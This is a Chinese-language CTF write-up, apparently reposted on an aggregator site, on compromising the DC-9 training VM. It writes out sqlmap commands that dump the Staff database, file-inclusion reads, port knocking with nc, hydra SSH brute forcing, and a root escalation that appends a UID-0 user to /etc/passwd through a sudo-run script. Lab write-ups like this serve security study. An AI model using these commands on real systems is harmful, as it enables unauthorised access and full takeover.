渗透DC-9靶机

渗透DC-9靶机0x00 环境介绍 DC 9 考点为 SQL 注入 密码爆破 小黄按照做完的思路做一下笔记 其中的弯路就不放在上面了 0x01 信息收集 1 IP 收集 使用 arp 协议扫描彧存活靶机 arp scan l 2 端口扫描 nmap A p 192 168 213 147 进入 web 页面继续收集

大家好,我是讯享网,很高兴认识大家。

0x00 环境介绍

0x01 信息收集

arp-scan -l 

讯享网

发现IP
讯享网
2)端口扫描

讯享网nmap -A -p- 192.168.213.147 

发现ssh不可用,待后面再继续研究
进入web页面继续收集

发现可疑存在输入输出参数,于=与数据库存在交互
查看源码
查看源码

0x02 渗透测试

这里存在sql注入使用sqlmap进行注入,通过源码查看到交互页面为results.php 指定注入目标

sqlmap.py -u "http://192.168.213.147/results.php" --data "search=jerry" -dbs #查库 sqlmap.py -u "http://192.168.213.147/results.php" --data "search=jerry" -D Staff -tables #查表 sqlmap.py -u "http://192.168.213.147/results.php" --data "search=jerry" -D Staff -T users -columns -bath #获取到密码字段以及账号密码 

*注入过程通过查库查表一步步研究,这里我直接将有用信息提取出来
账号密码

登陆后台
存在文件包含 通过越级查看网站账户目录,提取到一些列账号 密码
文件包含漏洞查看信息
文件包含
其实之前已经通过注入查询到相关的账号
查看源码发现ssh端口服务被关闭,可以通过nc连接端口
打开源码中三个端口连接
端口信息
开启nc
发现的三个端口开启

使用hydra爆破ssh使用之前发现的账号密码
爆破
爆破三个账号
登录三个账号ssh在janitor用户发现一些密码,再次利用密码作为字典,将之前为爆破账户再次提取出来,利用hydra再次爆破
发现密码
再次使用hydra爆破----发现***
爆破账号
再次登录账号发现目录root权限
发现root权限

0x03 权限提升

这里观察到这个是一个路径,在之前的suid提权网站没有找到相关的搜索
函数提权
发现py脚本
脚本作用:脚本将一个文件内容写入另外一个文件(root权限)

讯享网流程: dc-9:/opt/devstuff/dist/test$ openssl passwd -1 -salt aaa  #输出账户aaa密码的hash值 $1$aaa$8LT9tZ2ZqkvmMt74nqBXo0 dc-9:/opt/devstuff/dist/test$ echo 'aaa:$1$aaa$8LT9tZ2ZqkvmMt74nqBXo0:0:0::/root:/bin/bash' >> /tmp/passwd #写入tmp/passwd 暂存 aaa:$1$aaa$8LT9tZ2ZqkvmMt74nqBXo0:0:0::/root:/bin/bash #按照etc/passwd 的格式 dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/passwd /etc/passwd #利用提权脚本test.py写入到etc/passwd su - aaa #登录aaa输入密码 即为root权限 

提权成功
NICE!

本文章渗透流程为全部正确思路,初次尝试还得多研究研究😄

小讯
上一篇 2025-04-01 13:38
下一篇 2025-02-08 19:03

相关推荐

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容,请联系我们,一经查实,本站将立刻删除。
如需转载请保留出处:https://51itzy.com/kjqy/29520.html